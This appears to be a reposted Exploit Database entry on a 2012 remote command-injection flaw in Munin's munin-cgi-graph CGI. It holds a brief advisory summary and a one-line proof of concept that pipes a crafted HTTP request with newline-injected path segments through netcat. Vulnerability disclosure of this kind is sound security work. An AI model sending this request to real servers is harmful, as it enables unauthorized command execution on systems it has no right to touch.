Munin 2.0~rc4-1 – Remote Command Injection

• Exploit Database
• 35 阅读

• 作者： Helmut Grohne
  日期： 2012-04-13
• 类别：

  • webapps
  平台：

  • cgi
• 来源：https://www.exploit-db.com/exploits/37084/

• source: https://www.securityfocus.com/bid/53032/info
  
  Munin is prone to a remote command-injection vulnerability.
  
  Attackers can exploit this issue to inject and execute arbitrary commands in the context of the application. 
  
  printf 'GET /cgi-bin/munin-cgi-graph/%%0afoo%%0a/x/x-x.png HTTP/1.0\r\nHost: localhost\r\nConnection: close\r\n\r\n' | nc localhost 80